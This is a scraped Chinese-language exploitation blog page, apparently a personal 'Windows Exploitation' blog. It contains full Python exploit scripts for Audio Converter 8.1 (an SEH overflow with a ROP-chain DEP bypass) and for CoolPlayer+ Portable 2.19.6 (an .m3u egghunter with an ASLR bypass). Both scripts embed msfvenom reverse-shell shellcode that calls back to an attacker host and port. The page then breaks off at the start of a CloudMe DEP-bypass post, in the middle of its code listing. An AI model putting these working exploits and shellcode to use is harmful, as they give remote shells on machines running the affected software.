<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">total_size = <span class="number">200000</span></span><br><span class="line">filename=<span class="string">"exploit_seh.pls"</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.91.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode -b '\x00\x3d' </span></span><br><span class="line">shellcode = <span class="string">b""</span></span><br><span class="line">shellcode += <span class="string">b"\xdd\xc6\xd9\x74\x24\xf4\x58\x33\xc9\xbe\xab"</span></span><br><span class="line">shellcode += <span class="string">b"\x77\x29\x71\xb1\x52\x31\x70\x17\x03\x70\x17"</span></span><br><span class="line">shellcode += <span class="string">b"\x83\x43\x8b\xcb\x84\x6f\x9c\x8e\x67\x8f\x5d"</span></span><br><span class="line">shellcode += <span class="string">b"\xef\xee\x6a\x6c\x2f\x94\xff\xdf\x9f\xde\xad"</span></span><br><span class="line">shellcode += <span class="string">b"\xd3\x54\xb2\x45\x67\x18\x1b\x6a\xc0\x97\x7d"</span></span><br><span class="line">shellcode += <span class="string">b"\x45\xd1\x84\xbe\xc4\x51\xd7\x92\x26\x6b\x18"</span></span><br><span class="line">shellcode += <span class="string">b"\xe7\x27\xac\x45\x0a\x75\x65\x01\xb9\x69\x02"</span></span><br><span class="line">shellcode += <span class="string">b"\x5f\x02\x02\x58\x71\x02\xf7\x29\x70\x23\xa6"</span></span><br><span class="line">shellcode += <span class="string">b"\x22\x2b\xe3\x49\xe6\x47\xaa\x51\xeb\x62\x64"</span></span><br><span class="line">shellcode += <span class="string">b"\xea\xdf\x19\x77\x3a\x2e\xe1\xd4\x03\x9e\x10"</span></span><br><span class="line">shellcode += <span class="string">b"\x24\x44\x19\xcb\x53\xbc\x59\x76\x64\x7b\x23"</span></span><br><span class="line">shellcode += <span class="string">b"\xac\xe1\x9f\x83\x27\x51\x7b\x35\xeb\x04\x08"</span></span><br><span class="line">shellcode += <span class="string">b"\x39\x40\x42\x56\x5e\x57\x87\xed\x5a\xdc\x26"</span></span><br><span class="line">shellcode += <span class="string">b"\x21\xeb\xa6\x0c\xe5\xb7\x7d\x2c\xbc\x1d\xd3"</span></span><br><span class="line">shellcode += <span class="string">b"\x51\xde\xfd\x8c\xf7\x95\x10\xd8\x85\xf4\x7c"</span></span><br><span class="line">shellcode += <span class="string">b"\x2d\xa4\x06\x7d\x39\xbf\x75\x4f\xe6\x6b\x11"</span></span><br><span class="line">shellcode += <span class="string">b"\xe3\x6f\xb2\xe6\x04\x5a\x02\x78\xfb\x65\x73"</span></span><br><span class="line">shellcode += <span class="string">b"\x51\x38\x31\x23\xc9\xe9\x3a\xa8\x09\x15\xef"</span></span><br><span class="line">shellcode += <span class="string">b"\x7f\x59\xb9\x40\xc0\x09\x79\x31\xa8\x43\x76"</span></span><br><span class="line">shellcode += <span class="string">b"\x6e\xc8\x6c\x5c\x07\x63\x97\x37\xe8\xdc\xcc"</span></span><br><span class="line">shellcode += <span class="string">b"\x4e\x80\x1e\xf2\x41\x0d\x96\x14\x0b\xbd\xfe"</span></span><br><span class="line">shellcode += <span class="string">b"\x8f\xa4\x24\x5b\x5b\x54\xa8\x71\x26\x56\x22"</span></span><br><span class="line">shellcode += <span class="string">b"\x76\xd7\x19\xc3\xf3\xcb\xce\x23\x4e\xb1\x59"</span></span><br><span class="line">shellcode += <span class="string">b"\x3b\x64\xdd\x06\xae\xe3\x1d\x40\xd3\xbb\x4a"</span></span><br><span class="line">shellcode += <span class="string">b"\x05\x25\xb2\x1e\xbb\x1c\x6c\x3c\x46\xf8\x57"</span></span><br><span class="line">shellcode += <span class="string">b"\x84\x9d\x39\x59\x05\x53\x05\x7d\x15\xad\x86"</span></span><br><span class="line">shellcode += <span class="string">b"\x39\x41\x61\xd1\x97\x3f\xc7\x8b\x59\xe9\x91"</span></span><br><span class="line">shellcode += <span class="string">b"\x60\x30\x7d\x67\x4b\x83\xfb\x68\x86\x75\xe3"</span></span><br><span class="line">shellcode += <span class="string">b"\xd9\x7f\xc0\x1c\xd5\x17\xc4\x65\x0b\x88\x2b"</span></span><br><span class="line">shellcode += <span class="string">b"\xbc\x8f\xa8\xc9\x14\xfa\x40\x54\xfd\x47\x0d"</span></span><br><span class="line">shellcode += <span class="string">b"\x67\x28\x8b\x28\xe4\xd8\x74\xcf\xf4\xa9\x71"</span></span><br><span class="line">shellcode += <span class="string">b"\x8b\xb2\x42\x08\x84\x56\x64\xbf\xa5\x72"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create_rop_chain</span><span class="params">()</span>:</span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># rop chain generated with mona.py - www.corelan.be</span></span><br><span class="line"> rop_gadgets = [</span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_ebp:---]</span></span><br><span class="line"> <span class="number">0x10070b5f</span>, <span class="comment"># POP EBP # RETN [audconv.dll] </span></span><br><span class="line"> <span class="number">0x10070b5f</span>, <span class="comment"># skip 4 bytes [audconv.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_ebx:---]</span></span><br><span class="line"> <span class="number">0x1006c128</span>, <span class="comment"># POP EBX # RETN [audconv.dll] </span></span><br><span class="line"> <span class="number">0x00000001</span>, <span class="comment"># 0x00000001-> ebx</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_edx:---]</span></span><br><span class="line"> <span class="number">0x10082d43</span>, <span class="comment"># POP EDX # RETN [audconv.dll] </span></span><br><span class="line"> <span class="number">0x00001000</span>, <span class="comment"># 0x00001000-> edx</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_ecx:---]</span></span><br><span class="line"> <span class="number">0x10073e81</span>, <span class="comment"># POP ECX # RETN [audconv.dll] </span></span><br><span class="line"> <span class="number">0x00000040</span>, <span class="comment"># 0x00000040-> ecx</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_edi:---]</span></span><br><span class="line"> <span class="number">0x100147d2</span>, <span class="comment"># POP EDI # RETN [audconv.dll] </span></span><br><span class="line"> <span class="number">0x1003f2b9</span>, <span class="comment"># RETN (ROP NOP) [audconv.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_esi:---]</span></span><br><span class="line"> <span class="number">0x10001a43</span>, <span class="comment"># POP ESI # RETN [audconv.dll] </span></span><br><span class="line"> <span class="number">0x1006685a</span>, <span class="comment"># JMP [EAX] [audconv.dll]</span></span><br><span class="line"> <span class="number">0x1008264a</span>, <span class="comment"># POP EAX # RETN [audconv.dll] </span></span><br><span class="line"> <span class="number">0x100952c4</span>, <span class="comment"># ptr to &VirtualAlloc() [IAT audconv.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:pushad:---]</span></span><br><span class="line"> <span class="number">0x1002ef14</span>, <span class="comment"># PUSHAD # RETN [audconv.dll] </span></span><br><span class="line"> <span class="comment">#[---INFO:extras:---]</span></span><br><span class="line"> <span class="number">0x1002debd</span>, <span class="comment"># ptr to 'push esp # ret ' [audconv.dll]</span></span><br><span class="line"> ]</span><br><span class="line"> <span class="keyword">return</span> <span class="string">b''</span>.join(struct.pack(<span class="string">'<I'</span>, _) <span class="keyword">for</span> _ <span class="keyword">in</span> rop_gadgets)</span><br><span class="line"></span><br><span class="line">rop_chain = create_rop_chain()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">nops1 = <span class="string">b"\x90"</span>*<span class="number">32</span></span><br><span class="line">junk1 = <span class="string">b"A"</span>*<span class="number">32</span></span><br><span class="line">nops2 = <span class="string">b"\x90"</span>*(<span class="number">1240</span>+<span class="number">108</span>) <span class="comment">#</span></span><br><span class="line">payload = nops2+rop_chain+nops1+shellcode</span><br><span class="line">junk2 = <span class="string">b"A"</span>*(<span class="number">4436</span>-len(payload)<span class="number">-32</span>)</span><br><span class="line"><span class="comment"># seh = b"\xcc\xcc\xcc\xcc"</span></span><br><span class="line">seh = struct.pack(<span class="string">"<L"</span>,<span class="number">0x100646bb</span>) <span class="comment"># ADD ESP,0E44 # RETN</span></span><br><span class="line">junk3 = <span class="string">b"C"</span>*(<span class="number">45544</span><span class="number">-4432</span><span class="number">-4</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> open(filename, <span class="string">"wb"</span>) <span class="keyword">as</span> fp:</span><br><span class="line"> fp.write(junk1+payload+junk2+seh+junk3)</span><br></pre></td></tr></table></figure>
<p>成功反弹<code>shell</code>:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/03.png" alt="BOF"></p>
<p>来看一下<code>win10</code>,不开启<code>DEP</code>。溢出时,可以看到<code>SEH</code>链的第二条被我们覆盖了:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/09.png" alt="BOF"></p>
<p>在异常处理的时候,出现如下问题:(会一直停留在第一个异常处理函数里面,无法跳出)</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/10.png" alt="BOF"></p>
<p>谷歌了一下,说是异常没有捕获到。这里就不进一步讨论了。</p>
<p><strong>2022年5月14日更新:</strong>Win10利用失败的原因是,我想找一个<code>SafeSEH</code>关闭,且未开启<code>ASLR</code>的<code>DLL</code>,这样就可以保证利用脚本是稳定的,不会因为系统重启而无法使用。这里有且仅有<code>audconv.dll</code>,可以看上面我使用的地址,是以<code>00</code>开始,这样就导致内存里指令会被截断,而开始部分的<code>Win7</code>,<code>audconv.dll</code>地址空间不是以<code>00</code>开始,所以可以利用成功。</p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="https://n0maj1o24.github.io/2022/05/10/CoolPlayer-Portable-2-19-6-m3u-File-Stack-Overflow-Egghunter-ASLR-Bypass/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.jpeg">
<meta itemprop="name" content="n0maj1o24">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Technical Memorandum">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2022/05/10/CoolPlayer-Portable-2-19-6-m3u-File-Stack-Overflow-Egghunter-ASLR-Bypass/" class="post-title-link" itemprop="url">CoolPlayer+ Portable 2.19.6 - '.m3u' File Stack Overflow:Egghunter+ASLR Bypass</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2022-05-09 21:35:07" itemprop="dateCreated datePublished" datetime="2022-05-09T21:35:07Z">2022-05-09</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2022-05-12 15:30:02" itemprop="dateModified" datetime="2022-05-12T15:30:02Z">2022-05-12</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/Windows-Exploitation/" itemprop="url" rel="index"><span itemprop="name">Windows Exploitation</span></a>
</span>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-comment"></i>
</span>
<span class="post-meta-item-text">Valine:</span>
<a title="valine" href="/2022/05/10/CoolPlayer-Portable-2-19-6-m3u-File-Stack-Overflow-Egghunter-ASLR-Bypass/#valine-comments" itemprop="discussionUrl">
<span class="post-comments-count valine-comment-count" data-xid="/2022/05/10/CoolPlayer-Portable-2-19-6-m3u-File-Stack-Overflow-Egghunter-ASLR-Bypass/" itemprop="commentCount"></span>
</a>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>测试环境:<code>Windows 10 21H2 32</code>位,关闭全局<code>DEP</code>。最开始是想开启全局<code>DEP</code>,然后尝试<code>Egghunter+Bypass DEP+Bypass ASLR</code>,后来发现不可行,就把全局<code>DEP</code>关掉了。</p>
<p><code>exploit-db</code>上的链接:<a href="https://www.exploit-db.com/exploits/40151。" target="_blank" rel="noopener">https://www.exploit-db.com/exploits/40151。</a></p>
<p>基本操作没有太多有意思的点,就不阐述了。我选择的<code>2000</code>字节,<code>Offset</code>确定为<code>212</code>,坏字符为<code>\x00\x0a\x0d</code>。</p>
<p><code>mona</code>看一下未开启<code>ASLR</code>的模块:</p>
<p><img src="/2022/05/10/CoolPlayer-Portable-2-19-6-m3u-File-Stack-Overflow-Egghunter-ASLR-Bypass/01.png" alt="bof"></p>
<p>只有<code>coolplayer+.exe</code>本身,并且地址区间在<code>0x00400000</code>到<code>0x00485000</code>间。好了,问题来了,地址包含<code>00</code>,会截断后续的字符,我们如果需要<code>Bypass ASLR</code>的话,又只能使用这里的某个地址。为了更加直观的获取寄存器与我们输入的字符串之间的关系,检查查找坏字符时内存的情况:</p>
<p><img src="/2022/05/10/CoolPlayer-Portable-2-19-6-m3u-File-Stack-Overflow-Egghunter-ASLR-Bypass/01.png" alt="bof"></p>
<p>也就是说,<code>EBX</code>所指向的内存保存着我们的输入字符,按照一般的栈溢出,只需把<code>EIP</code>的值覆盖为一条类似<code>JMP EBX</code>即可。</p>
<p><img src="/2022/05/10/CoolPlayer-Portable-2-19-6-m3u-File-Stack-Overflow-Egghunter-ASLR-Bypass/03.png" alt="bof"></p>
<p>直接贴上最终的利用代码来分析:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"></span><br><span class="line">filename=<span class="string">"exploit.m3u"</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># msfvenom -p windows/shell_reverse_tcp LHOST=192.168.91.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode -b '\x00\x0a\x0d'</span></span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">b"w00tw00t"</span></span><br><span class="line">shellcode += <span class="string">b"\xba\x75\xb8\x3a\xf7\xd9\xc4\xd9\x74\x24\xf4"</span></span><br><span class="line">shellcode += <span class="string">b"\x58\x33\xc9\xb1\x52\x83\xc0\x04\x31\x50\x0e"</span></span><br><span class="line">shellcode += <span class="string">b"\x03\x25\xb6\xd8\x02\x39\x2e\x9e\xed\xc1\xaf"</span></span><br><span class="line">shellcode += <span class="string">b"\xff\x64\x24\x9e\x3f\x12\x2d\xb1\x8f\x50\x63"</span></span><br><span class="line">shellcode += <span class="string">b"\x3e\x7b\x34\x97\xb5\x09\x91\x98\x7e\xa7\xc7"</span></span><br><span class="line">shellcode += <span class="string">b"\x97\x7f\x94\x34\xb6\x03\xe7\x68\x18\x3d\x28"</span></span><br><span class="line">shellcode += <span class="string">b"\x7d\x59\x7a\x55\x8c\x0b\xd3\x11\x23\xbb\x50"</span></span><br><span class="line">shellcode += <span class="string">b"\x6f\xf8\x30\x2a\x61\x78\xa5\xfb\x80\xa9\x78"</span></span><br><span class="line">shellcode += <span class="string">b"\x77\xdb\x69\x7b\x54\x57\x20\x63\xb9\x52\xfa"</span></span><br><span class="line">shellcode += <span class="string">b"\x18\x09\x28\xfd\xc8\x43\xd1\x52\x35\x6c\x20"</span></span><br><span class="line">shellcode += <span class="string">b"\xaa\x72\x4b\xdb\xd9\x8a\xaf\x66\xda\x49\xcd"</span></span><br><span class="line">shellcode += <span class="string">b"\xbc\x6f\x49\x75\x36\xd7\xb5\x87\x9b\x8e\x3e"</span></span><br><span class="line">shellcode += <span class="string">b"\x8b\x50\xc4\x18\x88\x67\x09\x13\xb4\xec\xac"</span></span><br><span class="line">shellcode += <span class="string">b"\xf3\x3c\xb6\x8a\xd7\x65\x6c\xb2\x4e\xc0\xc3"</span></span><br><span class="line">shellcode += <span class="string">b"\xcb\x90\xab\xbc\x69\xdb\x46\xa8\x03\x86\x0e"</span></span><br><span class="line">shellcode += <span class="string">b"\x1d\x2e\x38\xcf\x09\x39\x4b\xfd\x96\x91\xc3"</span></span><br><span class="line">shellcode += <span class="string">b"\x4d\x5e\x3c\x14\xb1\x75\xf8\x8a\x4c\x76\xf9"</span></span><br><span class="line">shellcode += <span class="string">b"\x83\x8a\x22\xa9\xbb\x3b\x4b\x22\x3b\xc3\x9e"</span></span><br><span class="line">shellcode += <span class="string">b"\xe5\x6b\x6b\x71\x46\xdb\xcb\x21\x2e\x31\xc4"</span></span><br><span class="line">shellcode += <span class="string">b"\x1e\x4e\x3a\x0e\x37\xe5\xc1\xd9\xf8\x52\x92"</span></span><br><span class="line">shellcode += <span class="string">b"\x90\x91\xa0\x24\xb2\x3d\x2c\xc2\xde\xad\x78"</span></span><br><span class="line">shellcode += <span class="string">b"\x5d\x77\x57\x21\x15\xe6\x98\xff\x50\x28\x12"</span></span><br><span class="line">shellcode += <span class="string">b"\x0c\xa5\xe7\xd3\x79\xb5\x90\x13\x34\xe7\x37"</span></span><br><span class="line">shellcode += <span class="string">b"\x2b\xe2\x8f\xd4\xbe\x69\x4f\x92\xa2\x25\x18"</span></span><br><span class="line">shellcode += <span class="string">b"\xf3\x15\x3c\xcc\xe9\x0c\x96\xf2\xf3\xc9\xd1"</span></span><br><span class="line">shellcode += <span class="string">b"\xb6\x2f\x2a\xdf\x37\xbd\x16\xfb\x27\x7b\x96"</span></span><br><span class="line">shellcode += <span class="string">b"\x47\x13\xd3\xc1\x11\xcd\x95\xbb\xd3\xa7\x4f"</span></span><br><span class="line">shellcode += <span class="string">b"\x17\xba\x2f\x09\x5b\x7d\x29\x16\xb6\x0b\xd5"</span></span><br><span class="line">shellcode += <span class="string">b"\xa7\x6f\x4a\xea\x08\xf8\x5a\x93\x74\x98\xa5"</span></span><br><span class="line">shellcode += <span class="string">b"\x4e\x3d\xb8\x47\x5a\x48\x51\xde\x0f\xf1\x3c"</span></span><br><span class="line">shellcode += <span class="string">b"\xe1\xfa\x36\x39\x62\x0e\xc7\xbe\x7a\x7b\xc2"</span></span><br><span class="line">shellcode += <span class="string">b"\xfb\x3c\x90\xbe\x94\xa8\x96\x6d\x94\xf8"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">buff_size = <span class="number">2000</span></span><br><span class="line"><span class="comment">#egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\xb8\x38\xfe\xff\xff\xf7\xd8\xcd\x2e\x3c\x05\x5a\x74\xeb\xb8\x77\x30\x30\x74\x89\xd7\xaf\x75\xe6\xaf\x75\xe3\xff\xe7"</span></span><br><span class="line">egghunter = <span class="string">b"\x66\x81\xca\xff\x0f\x42\x52\x31\xc0\x66\x05\xc8\x01\xcd\x2e\x3c\x05\x5a\x74\xec\xb8\x77\x30\x30\x74\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"</span></span><br><span class="line">junk = <span class="string">b'\x90'</span>*(<span class="number">212</span>-len(egghunter))</span><br><span class="line">eip = struct.pack(<span class="string">"<L"</span>,<span class="number">0x00401897</span>) <span class="comment"># 0x00401897 : call ebx</span></span><br><span class="line">nops = <span class="string">b"\x90"</span>*<span class="number">32</span></span><br><span class="line">junk2 = <span class="string">b'C'</span>*(buff_size<span class="number">-212</span><span class="number">-4</span>-len(shellcode)<span class="number">-32</span>)</span><br><span class="line">payload = junk+egghunter+eip+nops+shellcode+junk2</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> open(filename,<span class="string">"wb"</span>) <span class="keyword">as</span> filehander:</span><br><span class="line"> filehander.write(payload)</span><br></pre></td></tr></table></figure>
<p>这里选择<code>0x00401897</code>用于覆盖EIP。</p>
<p><img src="/2022/05/10/CoolPlayer-Portable-2-19-6-m3u-File-Stack-Overflow-Egghunter-ASLR-Bypass/04.png" alt="bof"></p>
<p>发现<code>EIP</code>之后的值都变了,我这里在<code>EIP</code>之后是放的<code>\x90</code>。来看看此刻<code>EBX</code>所指向的内存的值:</p>
<p><img src="/2022/05/10/CoolPlayer-Portable-2-19-6-m3u-File-Stack-Overflow-Egghunter-ASLR-Bypass/05.png" alt="bof"></p>
<p>发现<code>EBX</code>所指向的内容就是我们输入的内容,并且没有截断。最开始想把<code>shellcode</code>放在导致溢出的<code>A</code>字符串所在的位置,这里的空间太少,不能直接放,只能考虑放<code>egghunter</code>代码。</p>
<p>成功反弹<code>shell</code>:(因为涉及到内存的搜索,反弹<code>shell</code>需要等待一些时间)</p>
<p><img src="/2022/05/10/CoolPlayer-Portable-2-19-6-m3u-File-Stack-Overflow-Egghunter-ASLR-Bypass/06.png" alt="bof"></p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="https://n0maj1o24.github.io/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.jpeg">
<meta itemprop="name" content="n0maj1o24">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Technical Memorandum">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/" class="post-title-link" itemprop="url">CloudMe v1.11.2 DEP and ASLR bypass using ROP gadgets</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2022-05-08 15:56:36" itemprop="dateCreated datePublished" datetime="2022-05-08T15:56:36Z">2022-05-08</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2022-05-12 15:30:01" itemprop="dateModified" datetime="2022-05-12T15:30:01Z">2022-05-12</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/Windows-Exploitation/" itemprop="url" rel="index"><span itemprop="name">Windows Exploitation</span></a>
</span>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-comment"></i>
</span>
<span class="post-meta-item-text">Valine:</span>
<a title="valine" href="/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/#valine-comments" itemprop="discussionUrl">
<span class="post-comments-count valine-comment-count" data-xid="/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/" itemprop="commentCount"></span>
</a>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>测试环境:<code>Windows 10 21H2 32</code>位,开启全局<code>DEP</code>。这里来看如何绕过<code>DEP</code>和<code>ASLR</code>。附带演示一下基于<code>SEH</code>栈溢出<code>DEP bypass</code>与普通<code>SEH</code>栈溢出利用代码结构的不同。</p>
<p><strong>普通栈溢出利用:</strong></p>
<p>这个程序可以用普通的栈溢出<code>DEP bypass</code>来完成利用。此时<code>Offset</code>为<code>1052</code>。太简单了,就不过多解释了。</p>
<p>查找未开启<code>ASLR</code>的<code>DLL</code>,并查找<code>RETN</code>:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">0:014> .load pykd.pyd</span><br><span class="line">0:014> !py mona noaslr</span><br></pre></td></tr></table></figure>
<p><img src="/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/02.png" alt="seh"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0:014> !py mona find -<span class="built_in">type</span> instr -s <span class="string">"retn"</span> -p 10 -o -m Qt5Core.dll</span><br></pre></td></tr></table></figure>
<p><img src="/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/03.png" alt="seh"></p>
<p>来看一下最终的利用代码:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span 